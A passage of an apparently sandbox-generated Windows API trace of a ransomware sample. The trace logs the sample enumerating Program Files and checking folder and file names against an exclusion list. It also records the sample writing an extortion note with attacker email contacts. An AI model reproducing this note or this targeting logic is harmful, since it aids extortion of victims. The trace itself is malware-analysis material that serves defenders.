ftLastWriteTime.dwLowDateTime=0xdc5053e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0136.587] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0136.587] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="tmp") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="winnt") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="temp") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="thumb") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="$Recycle.Bin") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="System Volume Information") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="Boot") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="Windows") returned="Windows Photo Viewer" [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".UAKXC") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".exe") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".dll") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".lnk") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".sys") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch=".msi") returned 0x0 [0136.587] StrStrIW (lpFirst="Windows Photo Viewer", lpSrch="R3ADM3.txt") returned 0x0 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.587] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.587] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.587] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6920 [0136.587] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0136.588] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0136.588] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.588] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdbd6edc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd6edc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0136.588] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0136.588] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="tmp") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="winnt") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="temp") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="thumb") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="$Recycle.Bin") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="System Volume Information") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="Boot") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="Windows") returned="Windows Portable Devices" [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".UAKXC") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".exe") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".dll") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".lnk") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".sys") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch=".msi") returned 0x0 [0136.588] StrStrIW (lpFirst="Windows Portable Devices", lpSrch="R3ADM3.txt") returned 0x0 [0136.588] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebca98 [0136.588] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.588] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.588] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3a78 [0136.588] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.588] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.588] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebca98 | out: hHeap=0xea0000) returned 1 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xee53f0 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6948 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3498 [0136.589] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee53f0 | out: hHeap=0xea0000) returned 1 [0136.589] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.589] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc59d960, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc59d960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0136.589] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0136.589] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="tmp") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="winnt") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="temp") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="thumb") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="$Recycle.Bin") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="System Volume Information") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="Boot") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="Windows") returned="Windows Sidebar" [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".UAKXC") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".exe") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".dll") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".lnk") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".sys") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch=".msi") returned 0x0 [0136.589] StrStrIW (lpFirst="Windows Sidebar", lpSrch="R3ADM3.txt") returned 0x0 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.589] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0136.590] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.590] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0136.590] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3080 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.590] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc59d960, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc59d960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3e78 | out: hHeap=0xea0000) returned 1 [0136.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ba8 | out: hHeap=0xea0000) returned 1 [0136.590] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0136.590] Sleep (dwMilliseconds=0x32) [0136.916] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.916] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0136.916] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.916] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b00 | out: hHeap=0xea0000) returned 1 [0136.917] CreateFileW (lpFileName="C:\\Program Files (x86)\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0136.918] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0136.918] WriteFile (in: hFile=0x2ac, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0136.919] CloseHandle (hObject=0x2ac) returned 1 [0136.919] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.919] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.919] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x575152b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x575152b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0136.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.919] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x575152b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x575152b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.919] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0136.919] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.919] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xdc446d00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc446d00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0136.919] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0136.919] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0136.919] StrStrIW (lpFirst="Adobe", lpSrch="tmp") returned 0x0 [0136.919] StrStrIW (lpFirst="Adobe", lpSrch="winnt") returned 0x0 [0136.919] StrStrIW (lpFirst="Adobe", lpSrch="temp") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="thumb") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="$Recycle.Bin") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="System Volume Information") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="Boot") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="Windows") returned 0x0 [0136.920] StrStrIW (lpFirst="Adobe", lpSrch="Trend Micro") returned 0x0 [0136.920] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.920] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.920] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0136.920] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.920] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.921] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b00 [0136.921] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0136.921] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0136.921] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc577800, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc577800, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0136.921] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0136.921] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0136.921] StrStrIW (lpFirst="Common Files", lpSrch="tmp") returned 0x0 [0136.921] StrStrIW (lpFirst="Common Files", lpSrch="winnt") returned 0x0 [0136.921] StrStrIW (lpFirst="Common Files", lpSrch="temp") returned 0x0 [0136.921] StrStrIW (lpFirst="Common Files", lpSrch="thumb") returned 0x0 [0136.921] StrStrIW (lpFirst="Common Files", lpSrch="$Recycle.Bin") returned 0x0 [0136.921] StrStrIW (lpFirst="Common Files", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.922] StrStrIW (lpFirst="Common Files", lpSrch="System Volume Information") returned 0x0 [0136.922] StrStrIW (lpFirst="Common Files", lpSrch="Boot") returned 0x0 [0136.922] StrStrIW (lpFirst="Common Files", lpSrch="Windows") returned 0x0 [0136.922] StrStrIW (lpFirst="Common Files", lpSrch="Trend Micro") returned 0x0 [0136.922] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b28 [0136.922] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.922] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.922] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.922] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.922] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.922] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b28 | out: hHeap=0xea0000) returned 1 [0136.922] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b28 [0136.922] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.922] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.922] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0136.922] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0136.922] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0136.922] StrStrIW (lpFirst="desktop.ini", lpSrch=".UAKXC") returned 0x0 [0136.922] StrStrIW (lpFirst="desktop.ini", lpSrch=".exe") returned 0x0 [0136.922] StrStrIW (lpFirst="desktop.ini", lpSrch=".dll") returned 0x0 [0136.922] StrStrIW (lpFirst="desktop.ini", lpSrch=".lnk") returned 0x0 [0136.922] StrStrIW (lpFirst="desktop.ini", lpSrch=".sys") returned 0x0 [0136.922] StrStrIW (lpFirst="desktop.ini", lpSrch=".msi") returned 0x0 [0136.923] StrStrIW (lpFirst="desktop.ini", lpSrch="R3ADM3.txt") returned 0x0 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b50 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0136.923] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.923] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.923] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b50 | out: hHeap=0xea0000) returned 1 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b50 [0136.923] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c08 [0136.923] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0136.923] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0136.923] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xdc5516a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5516a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0136.923] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0136.923] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0136.923] StrStrIW (lpFirst="Google", lpSrch="tmp") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="winnt") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="temp") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="thumb") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="$Recycle.Bin") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="System Volume Information") returned 0x0 [0136.923] StrStrIW (lpFirst="Google", lpSrch="Boot") returned 0x0 [0136.924] StrStrIW (lpFirst="Google", lpSrch="Windows") returned 0x0 [0136.924] StrStrIW (lpFirst="Google", lpSrch="Trend Micro") returned 0x0 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0136.924] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.924] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b78 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0136.924] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0136.924] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdbdbb080, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbdbb080, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0136.924] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0136.924] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="tmp") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="winnt") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="temp") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="thumb") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="$Recycle.Bin") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="System Volume Information") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="Boot") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="Windows") returned 0x0 [0136.924] StrStrIW (lpFirst="Internet Explorer", lpSrch="Trend Micro") returned 0x0 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.924] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3a78 [0136.925] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.925] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.925] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0136.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ba0 [0136.925] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xee53f0 [0136.925] HeapFree (in: hHeap=0xea0000, 